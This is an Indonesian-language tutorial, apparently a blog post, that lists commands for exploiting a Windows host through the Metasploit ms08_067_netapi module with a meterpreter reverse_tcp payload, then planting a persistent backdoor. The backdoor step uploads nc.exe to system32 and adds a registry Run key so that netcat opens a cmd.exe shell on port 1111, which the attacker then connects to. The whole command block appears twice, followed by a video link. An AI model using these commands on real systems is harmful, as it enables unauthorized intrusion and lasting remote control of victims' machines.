Tutorial Backdoor menggunakan exploit NC EXE
Langkah-langkahnya sebai berikut :
cp /pentest/windows-binaries/tools/nc.exe /root/Desktop/
nmap -sS -0 192.168.77.130
new terminal:
msfconsole
use exploit/windows/smb/ms08_067_netapi
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.77.133
set rhost 192.168.77.130
exploit
"jika exploit masuk, lanjutkan mengirim backdoor"
upload /root/Desktop/nc.exe c:\\WINDOWS\\system32\\
reg enumkey -k HKLM\\software\\Microsoft\\Windows\\CurrentVersion\\RUN
reg setval -k HKLM\\software\\Microsoft\\Windows\\CurrentVersion\\RUN -v BACKDOOR -d c:\\WINDOWS\\system32\\nc.exe" -L -d -p 1111 -e cmd.exe"
reg enumkey -k HKLM\\software\\Microsoft\\Windows\\CurrentVersion\\RUN
reboot
nc 192.168.77.130 1111
done
systeminfo
shutdown -r -t 20
Untuk lebih jelas lagi silakan buka link video dibawah ini :
https://www.youtube.com/watch?v=-prGVe4KOio
cp /pentest/windows-binaries/tools/nc.exe /root/Desktop/
nmap -sS -0 192.168.77.130
new terminal:
msfconsole
use exploit/windows/smb/ms08_067_netapi
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.77.133
set rhost 192.168.77.130
exploit
"jika exploit masuk, lanjutkan mengirim backdoor"
upload /root/Desktop/nc.exe c:\\WINDOWS\\system32\\
reg enumkey -k HKLM\\software\\Microsoft\\Windows\\CurrentVersion\\RUN
reg setval -k HKLM\\software\\Microsoft\\Windows\\CurrentVersion\\RUN -v BACKDOOR -d c:\\WINDOWS\\system32\\nc.exe" -L -d -p 1111 -e cmd.exe"
reg enumkey -k HKLM\\software\\Microsoft\\Windows\\CurrentVersion\\RUN
reboot
nc 192.168.77.130 1111
done
systeminfo
shutdown -r -t 20
Untuk lebih jelas lagi silakan buka link video dibawah ini :
https://www.youtube.com/watch?v=-prGVe4KOio



